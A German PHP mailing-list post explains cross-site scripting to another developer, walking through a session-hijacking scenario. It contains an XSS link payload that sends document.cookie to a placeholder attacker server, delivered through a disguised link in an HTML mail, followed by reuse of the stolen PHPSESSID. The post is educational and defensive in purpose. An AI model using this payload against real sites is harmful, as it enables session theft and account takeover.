[php] Zeitkontrolle

[Peter Prochaska]

Hi,

Norbert Pfeiffer wrote:
> also mal der Reihe nach:
> - ich modifiziere in meinem Browser eine URL um mir Informationen
>   von meinem PC anzusehen ... <gruebel>
> - okay - wenn man mit JS eine Mail versenden koennte, ohne dass
>   der User davon etwas mitbekommt, koennte man sich Informationen
>   zusenden lassen.
> - aber selbst, wenn ich mir Location.cookie schicken lasse, ist
>   es ja nur der Kekes, den ich selbst dort hinterlegt haben tue.
>   Der steht doch schon im PHP-Environment ... <gruebel>

Du hast den Sinn von Cross-Site-Scripting nicht verstanden. Das das 
Ausspionieren des eigenen Rechners keinen Sinn macht ist klar.

Einfaches Beispiel:
1. Ein Nutzer deiner Applikation loggt sich ein und erhält ein Session 
Cookie. In diesem Cookie steht nun die Session-ID von PHP.

2. Ein böser Bube schreibt eine HTML-Mail an eben diesen Nutzer und 
versteckt darin den Link 
www.test.de/index.php"><script>this.location.href='http://www.boeser-server.de/?cookie='+document.cookie</script><
Durch die Möglichkeiten die man in HTML hat, kann man den Link ja anders 
anzeigen lassen, z.B. "Hier gehts zum Gewinnspiel".

3. Klickt der Nutzer nun auf diesen Link, wird das Session Cookie an den 
Server http://www.boeser-server.de übermittelt und der Angreifer hat die 
Session-ID. Vorausgesetzt der Browser ist noch geöffnet und der Nutzer 
noch angemeldet. (Aber wer drückt schon auf "Abmelden"... :-))

4. Ein Aufruf deiner Seite mit ?PHPSESSID=<gestohlene ID> und der 
Angreifer ist der angemeldete Nutzer.

Verstanden? :-)

Gruß
-- 
Peter Prochaska
Internet- und Securitydienste, P544
DATEV eG
Tel: +49 911 276-5187